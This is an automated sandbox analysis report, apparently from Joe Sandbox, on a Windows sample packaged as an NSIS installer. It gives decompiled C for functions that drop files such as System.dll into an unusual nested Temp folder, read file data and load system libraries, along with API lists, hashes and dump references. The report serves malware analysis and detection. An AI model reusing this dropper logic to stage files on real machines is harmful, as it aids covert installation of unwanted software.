Associated: 00000006.00000002.45132454040.00000000007B3000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007C6000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007D8000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45135016541.00000000007DA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_hi38VYWujz.jbxd

Similarity

API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
String ID: Call$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
API String ID: 717251189-1230650788
Opcode ID: 1ab1bfc9e483f0d7decbabd2a64a8250e199f3f83b6f9b6e16045226286d04ff
Instruction ID: 53892de15873aface2ea8104bec8e4e448d1085f61c5dcff38edd77b46373637
Opcode Fuzzy Hash: 1ab1bfc9e483f0d7decbabd2a64a8250e199f3f83b6f9b6e16045226286d04ff
Instruction Fuzzy Hash: AA610371A00111AADF249F64DC40ABE37A5BF55324F12813FE547B62D0DB3D89A2CB5D

Uniqueness

Uniqueness Score: -1.00%

Function 0040176F Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 145
stringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 61%

			E0040176F(FILETIME* __ebx, void* __eflags) {
				void* __edi;
				void* _t35;
				void* _t43;
				void* _t45;
				FILETIME* _t51;
				FILETIME* _t64;
				void* _t66;
				signed int _t72;
				FILETIME* _t73;
				FILETIME* _t77;
				signed int _t79;
				void* _t81;
				void* _t82;
				WCHAR* _t84;
				void* _t86;

				_t77 = __ebx;
				 *(_t86 - 8) = E00402C37(0x31);
				 *(_t86 + 8) =  *(_t86 - 0x28) & 0x00000007;
				_t35 = E00405BA7( *(_t86 - 8));
				_push( *(_t86 - 8));
				_t84 = L"Call";
				if(_t35 == 0) {
					lstrcatW(E00405B30(E0040625F(_t84, L"C:\\Users\\Arthur\\AppData\\Local\\Temp\\Cascara\\Personers\\Narra\\Freons\\Entrenching\\Samsen")), ??);
				} else {
					E0040625F();
				}
				E004064F3(_t84);
				while(1) {
					__eflags =  *(_t86 + 8) - 3;
					if( *(_t86 + 8) >= 3) {
						_t66 = E004065A2(_t84);
						_t79 = 0;
						__eflags = _t66 - _t77;
						if(_t66 != _t77) {
							_t73 = _t66 + 0x14;
							__eflags = _t73;
							_t79 = CompareFileTime(_t73, _t86 - 0x1c);
						}
						asm("sbb eax, eax");
						_t72 =  ~(( *(_t86 + 8) + 0xfffffffd | 0x80000000) & _t79) + 1;
						__eflags = _t72;
						 *(_t86 + 8) = _t72;
					}
					__eflags =  *(_t86 + 8) - _t77;
					if( *(_t86 + 8) == _t77) {
						E00405D2C(_t84);
					}
					__eflags =  *(_t86 + 8) - 1;
					_t43 = E00405D51(_t84, 0x40000000, (0 |  *(_t86 + 8) != 0x00000001) + 1);
					__eflags = _t43 - 0xffffffff;
					 *(_t86 - 0x30) = _t43;
					if(_t43 != 0xffffffff) {
						break;
					}
					__eflags =  *(_t86 + 8) - _t77;
					if( *(_t86 + 8) != _t77) {
						E004052C3(0xffffffe2,  *(_t86 - 8));
						__eflags =  *(_t86 + 8) - 2;
						if(__eflags == 0) {
							 *((intOrPtr*)(_t86 - 4)) = 1;
						}
						L31:
						 *0x7a8ac8 =  *0x7a8ac8 +  *((intOrPtr*)(_t86 - 4));
						__eflags =  *0x7a8ac8;
						goto L32;
					} else {
						E0040625F("C:\Users\Arthur\AppData\Local\Temp\nscDB19.tmp", _t81);
						E0040625F(_t81, _t84);
						E00406281(_t77, _t81, _t84, "C:\Users\Arthur\AppData\Local\Temp\nscDB19.tmp\System.dll",  *((intOrPtr*)(_t86 - 0x14)));
						E0040625F(_t81, "C:\Users\Arthur\AppData\Local\Temp\nscDB19.tmp");
						_t64 = E004058C1("C:\Users\Arthur\AppData\Local\Temp\nscDB19.tmp\System.dll",  *(_t86 - 0x28) >> 3) - 4;
						__eflags = _t64;
						if(_t64 == 0) {
							continue;
						} else {
							__eflags = _t64 == 1;
							if(_t64 == 1) {
								 *0x7a8ac8 =  &( *0x7a8ac8->dwLowDateTime);
								L32:
								_t51 = 0;
								__eflags = 0;
							} else {
								_push(_t84);
								_push(0xfffffffa);
								E004052C3();
								L29:
								_t51 = 0x7fffffff;
							}
						}
					}
					L33:
					return _t51;
				}
				E004052C3(0xffffffea,  *(_t86 - 8));
				 *0x7a8af4 =  *0x7a8af4 + 1;
				_push(_t77);
				_push(_t77);
				_push( *(_t86 - 0x30));
				_push( *((intOrPtr*)(_t86 - 0x20)));
				_t45 = E004030FA(); // executed
				 *0x7a8af4 =  *0x7a8af4 - 1;
				__eflags =  *(_t86 - 0x1c) - 0xffffffff;
				_t82 = _t45;
				if( *(_t86 - 0x1c) != 0xffffffff) {
					L22:
					SetFileTime( *(_t86 - 0x30), _t86 - 0x1c, _t77, _t86 - 0x1c); // executed
				} else {
					__eflags =  *((intOrPtr*)(_t86 - 0x18)) - 0xffffffff;
					if( *((intOrPtr*)(_t86 - 0x18)) != 0xffffffff) {
						goto L22;
					}
				}
				CloseHandle( *(_t86 - 0x30)); // executed
				__eflags = _t82 - _t77;
				if(_t82 >= _t77) {
					goto L31;
				} else {
					__eflags = _t82 - 0xfffffffe;
					if(_t82 != 0xfffffffe) {
						E00406281(_t77, _t82, _t84, _t84, 0xffffffee);
					} else {
						E00406281(_t77, _t82, _t84, _t84, 0xffffffe9);
						lstrcatW(_t84,  *(_t86 - 8));
					}
					_push(0x200010);
					_push(_t84);
					E004058C1();
					goto L29;
				}
				goto L33;
			}

0x0040176f
0x00401776
0x00401782
0x00401785
0x0040178a
0x0040178d
0x00401794
0x004017b0
0x00401796
0x00401797
0x00401797
0x004017b6
0x004017bb
0x004017bb
0x004017bf
0x004017c2
0x004017c7
0x004017c9
0x004017cb
0x004017d0
0x004017d0
0x004017db
0x004017db
0x004017ec
0x004017ee
0x004017ee
0x004017ef
0x004017ef
0x004017f2
0x004017f5
0x004017f8
0x004017f8
0x004017ff
0x0040180e
0x00401813
0x00401816
0x00401819
0x00000000
0x00000000
0x0040181b
0x0040181e
0x00401874
0x00401879
0x004015b6
0x00402885
0x00402885
0x00402abf
0x00402ac2
0x00402ac2
0x00000000
0x00401820
0x00401826
0x0040182d
0x0040183a
0x00401845
0x0040185b
0x0040185b
0x0040185e
0x00000000
0x00401864
0x00401864
0x00401865
0x00401882
0x00402ac8
0x00402ac8
0x00402ac8
0x00401867
0x00401867
0x00401868
0x00401493
0x004022f1
0x004022f1
0x004022f1
0x00401865
0x0040185e
0x00402aca
0x00402ace
0x00402ace
0x00401892
0x00401897
0x0040189d
0x0040189e
0x0040189f
0x004018a2
0x004018a5
0x004018aa
0x004018b0
0x004018b4
0x004018b6
0x004018be
0x004018ca
0x004018b8
0x004018b8
0x004018bc
0x00000000
0x00000000
0x004018bc
0x004018d3
0x004018d9
0x004018db
0x00000000
0x004018e1
0x004018e1
0x004018e4
0x004018fc
0x004018e6
0x004018e9
0x004018f2
0x004018f2
0x00401901
0x00401906
0x004022ec
0x00000000
0x004022ec
0x00000000

APIs

lstrcatW.KERNEL32(00000000,00000000), ref: 004017B0
CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Local\Temp\Cascara\Personers\Narra\Freons\Entrenching\Samsen,?,?,00000031), ref: 004017D5

Part of subcall function 0040625F: lstrcpynW.KERNEL32(?,?,00000400,00403421,007A7A20,NSIS Error,?,00000006,00000008,0000000A), ref: 0040626C

Part of subcall function 004052C3: lstrlenW.KERNEL32(007A0F00,00000000,007924D8,75ED23A0,?,?,?,?,?,?,?,?,?,0040323B,00000000,?), ref: 004052FB
Part of subcall function 004052C3: lstrlenW.KERNEL32(0040323B,007A0F00,00000000,007924D8,75ED23A0,?,?,?,?,?,?,?,?,?,0040323B,00000000), ref: 0040530B
Part of subcall function 004052C3: lstrcatW.KERNEL32(007A0F00,0040323B), ref: 0040531E
Part of subcall function 004052C3: SetWindowTextW.USER32(007A0F00,007A0F00), ref: 00405330
Part of subcall function 004052C3: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405356
Part of subcall function 004052C3: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405370
Part of subcall function 004052C3: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040537E

Strings

C:\Users\user\AppData\Local\Temp\nscDB19.tmp, xrefs: 00401821, 0040183F
C:\Users\user\AppData\Local\Temp\Cascara\Personers\Narra\Freons\Entrenching\Samsen, xrefs: 0040179E
Call, xrefs: 0040178D, 00401796, 004017A3, 004017C1, 004017F7, 0040180D, 0040182B, 00401867, 004018E8, 004018F1, 004018FB, 00401906
C:\Users\user\AppData\Local\Temp\nscDB19.tmp\System.dll, xrefs: 00401835, 00401851

Memory Dump Source

Source File: 00000006.00000002.45132331372.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.45132294401.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132406736.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.0000000000789000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007AB000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007B3000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007C6000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007D8000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45135016541.00000000007DA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_hi38VYWujz.jbxd

Similarity

API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
String ID: C:\Users\user\AppData\Local\Temp\Cascara\Personers\Narra\Freons\Entrenching\Samsen$C:\Users\user\AppData\Local\Temp\nscDB19.tmp$C:\Users\user\AppData\Local\Temp\nscDB19.tmp\System.dll$Call
API String ID: 1941528284-2987419841
Opcode ID: 3036717f3dd684cf2377e65c949b0f8917e20074c55b6eb4d43db9bd976140e3
Instruction ID: f7ad0716a47908c9ff001062aeffa45098cd3b08a1486a00dbbe40ca2a302bdd
Opcode Fuzzy Hash: 3036717f3dd684cf2377e65c949b0f8917e20074c55b6eb4d43db9bd976140e3
Instruction Fuzzy Hash: 56419671910515BECF117BA5CD85DAF3A75EF41329B20823FF412B11E2CA3C8A529A6E

Uniqueness

Uniqueness Score: -1.00%

Function 00402644 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 153
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 83%

			E00402644(intOrPtr __ebx, intOrPtr __edx, void* __esi) {
				intOrPtr _t65;
				intOrPtr _t66;
				intOrPtr _t72;
				void* _t76;
				void* _t79;

				_t72 = __edx;
				 *((intOrPtr*)(_t76 - 8)) = __ebx;
				_t65 = 2;
				 *((intOrPtr*)(_t76 - 0x48)) = _t65;
				_t66 = E00402C15(_t65);
				_t79 = _t66 - 1;
				 *((intOrPtr*)(_t76 - 0x4c)) = _t72;
				 *((intOrPtr*)(_t76 - 0x3c)) = _t66;
				if(_t79 < 0) {
					L36:
					 *0x7a8ac8 =  *0x7a8ac8 +  *((intOrPtr*)(_t76 - 4));
				} else {
					__ecx = 0x3ff;
					if(__eax > 0x3ff) {
						 *(__ebp - 0x3c) = 0x3ff;
					}
					if( *__esi == __bx) {
						L34:
						__ecx =  *(__ebp - 0xc);
						__eax =  *(__ebp - 8);
						 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __bx;
						if(_t79 == 0) {
							 *((intOrPtr*)(_t76 - 4)) = 1;
						}
						goto L36;
					} else {
						 *(__ebp - 0x30) = __ebx;
						 *(__ebp - 0x10) = E004061BF(__ecx, __esi);
						if( *(__ebp - 0x3c) > __ebx) {
							do {
								if( *((intOrPtr*)(__ebp - 0x2c)) != 0x39) {
									if( *((intOrPtr*)(__ebp - 0x1c)) != __ebx ||  *(__ebp - 8) != __ebx || E00405E32( *(__ebp - 0x10), __ebx) >= 0) {
										__eax = __ebp - 0x44;
										if(E00405DD4( *(__ebp - 0x10), __ebp - 0x44, 2) == 0) {
											goto L34;
										} else {
											goto L21;
										}
									} else {
										goto L34;
									}
								} else {
									__eax = __ebp - 0x38;
									_push(__ebx);
									_push(__ebp - 0x38);
									__eax = 2;
									__ebp - 0x38 -  *((intOrPtr*)(__ebp - 0x1c)) = __ebp + 0xa;
									__eax = ReadFile( *(__ebp - 0x10), __ebp + 0xa, __ebp - 0x38 -  *((intOrPtr*)(__ebp - 0x1c)), ??, ??); // executed
									if(__eax == 0) {
										goto L34;
									} else {
										__ecx =  *(__ebp - 0x38);
										if(__ecx == __ebx) {
											goto L34;
										} else {
											__ax =  *(__ebp + 0xa) & 0x000000ff;
											 *(__ebp - 0x48) = __ecx;
											 *(__ebp - 0x44) = __eax;
											if( *((intOrPtr*)(__ebp - 0x1c)) != __ebx) {
												L28:
												__ax & 0x0000ffff = E004061A6( *(__ebp - 0xc), __ax & 0x0000ffff);
											} else {
												__ebp - 0x44 = __ebp + 0xa;
												if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa, __ecx, __ebp - 0x44, ?str?) != 0) {
													L21:
													__eax =  *(__ebp - 0x44);
												} else {
													__esi =  *(__ebp - 0x48);
													__esi =  ~( *(__ebp - 0x48));
													while(1) {
														_t22 = __ebp - 0x38;
														 *_t22 =  *(__ebp - 0x38) - 1;
														__eax = 0xfffd;
														 *(__ebp - 0x44) = 0xfffd;
														if( *_t22 == 0) {
															goto L22;
														}
														 *(__ebp - 0x48) =  *(__ebp - 0x48) - 1;
														__esi = __esi + 1;
														__eax = SetFilePointer( *(__ebp - 0x10), __esi, __ebx, "true"); // executed
														__ebp - 0x44 = __ebp + 0xa;
														if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa,  *(__ebp - 0x38), __ebp - 0x44, ?str?) == 0) {
															continue;
														} else {
															goto L21;
														}
														goto L22;
													}
												}
												L22:
												if( *((intOrPtr*)(__ebp - 0x1c)) != __ebx) {
													goto L28;
												} else {
													if( *(__ebp - 0x30) == 0xd ||  *(__ebp - 0x30) == 0xa) {
														if( *(__ebp - 0x30) == __ax || __ax != 0xd && __ax != 0xa) {
															 *(__ebp - 0x48) =  ~( *(__ebp - 0x48));
															__eax = SetFilePointer( *(__ebp - 0x10),  ~( *(__ebp - 0x48)), __ebx, "true");
														} else {
															__ecx =  *(__ebp - 0xc);
															__edx =  *(__ebp - 8);
															 *(__ebp - 8) =  *(__ebp - 8) + 1;
															 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
														}
														goto L34;
													} else {
														__ecx =  *(__ebp - 0xc);
														__edx =  *(__ebp - 8);
														 *(__ebp - 8) =  *(__ebp - 8) + 1;
														 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
														 *(__ebp - 0x30) = __eax;
														if(__ax == __bx) {
															goto L34;
														} else {
															goto L26;
														}
													}
												}
											}
										}
									}
								}
								goto L37;
								L26:
								__eax =  *(__ebp - 8);
							} while ( *(__ebp - 8) <  *(__ebp - 0x3c));
						}
						goto L34;
					}
				}
				L37:
				return 0;
			}

0x00402644
0x00402646
0x00402649
0x0040264b
0x0040264e
0x00402653
0x00402657
0x0040265a
0x0040265d
0x00402abf
0x00402ac2
0x00402663
0x00402663
0x0040266a
0x0040266c
0x0040266c
0x00402672
0x004027d6
0x004027d6
0x004027d9
0x004027de
0x004015b6
0x00402885
0x00402885
0x00000000
0x00402678
0x00402679
0x00402684
0x00402687
0x00402693
0x00402697
0x0040272f
0x00402747
0x00402757
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0040269d
0x0040269d
0x004026a0
0x004026a1
0x004026a4
0x004026a9
0x004026b0
0x004026b8
0x00000000
0x004026be
0x004026be
0x004026c3
0x00000000
0x004026c9
0x004026c9
0x004026d1
0x004026d4
0x004026d7
0x00402792
0x00402799
0x004026dd
0x004026e3
0x004026ef
0x00402759
0x00402759
0x004026f1
0x004026f1
0x004026f4
0x004026f6
0x004026f6
0x004026f6
0x004026f9
0x004026fe
0x00402701
0x00000000
0x00000000
0x00402703
0x00402706
0x0040270e
0x0040271a
0x00402728
0x00000000
0x0040272a
0x00000000
0x0040272a
0x00000000
0x00402728
0x004026f6
0x0040275c
0x0040275f
0x00000000
0x00402761
0x00402766
0x004027a7
0x004027c9
0x004027d0
0x004027b5
0x004027b5
0x004027b8
0x004027bb
0x004027be
0x004027be
0x00000000
0x0040276f
0x0040276f
0x00402772
0x00402775
0x0040277b
0x0040277f
0x00402782
0x00000000
0x00000000
0x00000000
0x00000000
0x00402782
0x00402766
0x0040275f
0x004026d7
0x004026c3
0x004026b8
0x00000000
0x00402784
0x00402784
0x00402787
0x00402790
0x00000000
0x00402687
0x00402672
0x00402ac8
0x00402ace

APIs

ReadFile.KERNELBASE(?,?,?,?), ref: 004026B0
MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,?), ref: 004026EB
SetFilePointer.KERNELBASE(?,?,?,?,?,00000008,?,?,?,?), ref: 0040270E
MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,?,?,?,?,00000008,?,?,?,?), ref: 00402724

Part of subcall function 00405E32: SetFilePointer.KERNEL32(?,00000000,00000000,?,?,00000000,?,?,00402629,00000000,00000000,?,00000000,00000011), ref: 00405E48

SetFilePointer.KERNEL32(?,?,?,?,?,?,00000002), ref: 004027D0

Strings

9, xrefs: 00402693

Memory Dump Source

Source File: 00000006.00000002.45132331372.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.45132294401.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132406736.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.0000000000789000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007AB000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007B3000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007C6000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007D8000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45135016541.00000000007DA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_hi38VYWujz.jbxd

Similarity

API ID: File$Pointer$ByteCharMultiWide$Read
String ID: 9
API String ID: 163830602-2366072709
Opcode ID: bbfadd1fb82cd2902055e903a3e488c979ded5586cb93e8eb0be3a96e306ad52
Instruction ID: 9be2b0b37b52d723af7ab0687330b4cdc43bee68c69c879290400e1721267ab5
Opcode Fuzzy Hash: bbfadd1fb82cd2902055e903a3e488c979ded5586cb93e8eb0be3a96e306ad52
Instruction Fuzzy Hash: BA51F675D00219AADF20DFA5DA88AAEB779FF04304F10443BE511F72D0DBB89982CB58

Uniqueness

Uniqueness Score: -1.00%

Function 004065C9 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E004065C9(intOrPtr _a4) {
				short _v576;
				signed int _t13;
				struct HINSTANCE__* _t17;
				signed int _t19;
				void* _t24;

				_t13 = GetSystemDirectoryW( &_v576, 0x104);
				if(_t13 > 0x104) {
					_t13 = 0;
				}
				if(_t13 == 0 ||  *((short*)(_t24 + _t13 * 2 - 0x23e)) == 0x5c) {
					_t19 = 1;
				} else {
					_t19 = 0;
				}
				wsprintfW(_t24 + _t13 * 2 - 0x23c, L"%s%S.dll", 0x40a014 + _t19 * 2, _a4);
				_t17 = LoadLibraryExW( &_v576, 0, 8); // executed
				return _t17;
			}

0x004065e0
0x004065e9
0x004065eb
0x004065eb
0x004065ef
0x00406602
0x004065fc
0x004065fc
0x004065fc
0x0040661b
0x0040662f
0x00406636

APIs

GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004065E0
wsprintfW.USER32 ref: 0040661B
LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 0040662F

Strings

UXTHEME, xrefs: 004065D2
\, xrefs: 004065F1
%s%S.dll, xrefs: 00406615

Memory Dump Source

Source File: 00000006.00000002.45132331372.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.45132294401.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132406736.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.0000000000789000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007AB000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007B3000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007C6000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007D8000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45135016541.00000000007DA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_hi38VYWujz.jbxd

Similarity

API ID: DirectoryLibraryLoadSystemwsprintf
String ID: %s%S.dll$UXTHEME$\
API String ID: 2200240437-1946221925
Opcode ID: fcd04411c5a1f64f7e9219edfc5ac0d332aa1f587fd7b062781a7321f30925af
Instruction ID: 20a568d0c0fc1602bd6380e0cb5a56c4d8b7367864d21650c92abf75bc562668
Opcode Fuzzy Hash: fcd04411c5a1f64f7e9219edfc5ac0d332aa1f587fd7b062781a7321f30925af
Instruction Fuzzy Hash: E5F0F670500219AADB14AB64ED0DF9B366CAB00304F10447AA646F11D1EBB8DA24CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 004030FA Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 161
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 95%

			E004030FA(int _a4, intOrPtr _a8, intOrPtr _a12, int _a16, signed char _a19) {
				signed int _v8;
				int _v12;
				intOrPtr _v16;
				long _v20;
				intOrPtr _v24;
				short _v152;
				void* _t65;
				long _t70;
				intOrPtr _t74;
				long _t75;
				intOrPtr _t76;
				void* _t77;
				int _t87;
				intOrPtr _t91;
				intOrPtr _t94;
				long _t95;
				signed int _t96;
				int _t97;
				int _t98;
				intOrPtr _t99;
				void* _t100;
				void* _t101;

				_t96 = _a16;
				_t91 = _a12;
				_v12 = _t96;
				if(_t91 == 0) {
					_v12 = 0x8000;
				}
				_v8 = _v8 & 0x00000000;
				_v16 = _t91;
				if(_t91 == 0) {
					_v16 = 0x78f6d8;
				}
				_t62 = _a4;
				if(_a4 >= 0) {
					E00403308( *0x7a8a98 + _t62);
				}
				if(E004032F2( &_a16, 4) == 0) {
					L41:
					_push(0xfffffffd);
					goto L42;
				} else {
					if((_a19 & 0x00000080) == 0) {
						if(_t91 != 0) {
							if(_a16 < _t96) {
								_t96 = _a16;
							}
							if(E004032F2(_t91, _t96) != 0) {
								_v8 = _t96;
								L44:
								return _v8;
							} else {
								goto L41;
							}
						}
						if(_a16 <= _t91) {
							goto L44;
						}
						_t87 = _v12;
						while(1) {
							_t97 = _a16;
							if(_a16 >= _t87) {
								_t97 = _t87;
							}
							if(E004032F2(0x78b6d8, _t97) == 0) {
								goto L41;
							}
							if(E00405E03(_a8, 0x78b6d8, _t97) == 0) {
								L28:
								_push(0xfffffffe);
								L42:
								_pop(_t65);
								return _t65;
							}
							_v8 = _v8 + _t97;
							_a16 = _a16 - _t97;
							if(_a16 > 0) {
								continue;
							}
							goto L44;
						}
						goto L41;
					}
					_t70 = GetTickCount();
					 *0x40ce38 =  *0x40ce38 & 0x00000000;
					_t14 =  &_a16;
					 *_t14 = _a16 & 0x7fffffff;
					_v20 = _t70;
					 *0x40ce20 = 0xb;
					_a4 = _a16;
					if( *_t14 <= 0) {
						goto L44;
					} else {
						goto L9;
					}
					while(1) {
						L9:
						_t98 = 0x4000;
						if(_a16 < 0x4000) {
							_t98 = _a16;
						}
						if(E004032F2(0x78b6d8, _t98) == 0) {
							goto L41;
						}
						_a16 = _a16 - _t98;
						 *0x40ce10 = 0x78b6d8;
						 *0x40ce14 = _t98;
						while(1) {
							_t94 = _v16;
							 *0x40ce18 = _t94;
							 *0x40ce1c = _v12;
							_t74 = E0040679A(0x40ce10);
							_v24 = _t74;
							if(_t74 < 0) {
								break;
							}
							_t99 =  *0x40ce18; // 0x7924d8
							_t100 = _t99 - _t94;
							_t75 = GetTickCount();
							_t95 = _t75;
							if(( *0x7a8af4 & 0x00000001) != 0 && (_t75 - _v20 > 0xc8 || _a16 == 0)) {
								wsprintfW( &_v152, L"... %d%%", MulDiv(_a4 - _a16, 0x64, _a4));
								_t101 = _t101 + 0xc;
								E004052C3(0,  &_v152);
								_v20 = _t95;
							}
							if(_t100 == 0) {
								if(_a16 > 0) {
									goto L9;
								}
								goto L44;
							} else {
								if(_a12 != 0) {
									_t76 =  *0x40ce18; // 0x7924d8
									_v8 = _v8 + _t100;
									_v12 = _v12 - _t100;
									_v16 = _t76;
									L23:
									if(_v24 != 4) {
										continue;
									}
									goto L44;
								}
								_t77 = E00405E03(_a8, _v16, _t100); // executed
								if(_t77 == 0) {
									goto L28;
								}
								_v8 = _v8 + _t100;
								goto L23;
							}
						}
						_push(0xfffffffc);
						goto L42;
					}
					goto L41;
				}
			}

0x00403105
0x00403109
0x0040310c
0x00403111
0x00403113
0x00403113
0x0040311a
0x0040311e
0x00403123
0x00403125
0x00403125
0x0040312c
0x00403131
0x0040313c
0x0040313c
0x0040314e
0x004032e0
0x004032e0
0x00000000
0x00403154
0x00403158
0x0040328d
0x004032d0
0x004032d2
0x004032d2
0x004032de
0x004032e5
0x004032e8
0x00000000
0x00000000
0x00000000
0x00000000
0x004032de
0x00403292
0x00000000
0x00000000
0x00403294
0x00403297
0x0040329a
0x0040329d
0x0040329f
0x0040329f
0x004032af
0x00000000
0x00000000
0x004032bd
0x00403287
0x00403287
0x004032e2
0x004032e2
0x00000000
0x004032e2
0x004032bf
0x004032c2
0x004032c9
0x00000000
0x00000000
0x00000000
0x004032cb
0x00000000
0x00403297
0x00403164
0x00403166
0x0040316d
0x0040316d
0x00403174
0x0040317a
0x00403181
0x00403184
0x00000000
0x00000000
0x00000000
0x00000000
0x0040318a
0x0040318a
0x0040318a
0x00403192
0x00403194
0x00403194
0x004031a5
0x00000000
0x00000000
0x004031ab
0x004031ae
0x004031b4
0x004031ba
0x004031ba
0x004031c5
0x004031cb
0x004031d0
0x004031d7
0x004031da
0x00000000
0x00000000
0x004031e0
0x004031e6
0x004031e8
0x004031f1
0x004031f3
0x00403224
0x0040322a
0x00403236
0x0040323b
0x0040323b
0x00403240
0x0040327b
0x00000000
0x00000000
0x00000000
0x00403242
0x00403246
0x0040325d
0x00403262
0x00403265
0x00403268
0x0040326b
0x0040326f
0x00000000
0x00000000
0x00000000
0x00403275
0x0040324f
0x00403256
0x00000000
0x00000000
0x00403258
0x00000000
0x00403258
0x00403240
0x00403283
0x00000000
0x00403283
0x00000000
0x0040318a

APIs

GetTickCount.KERNEL32 ref: 00403164
GetTickCount.KERNEL32 ref: 004031E8
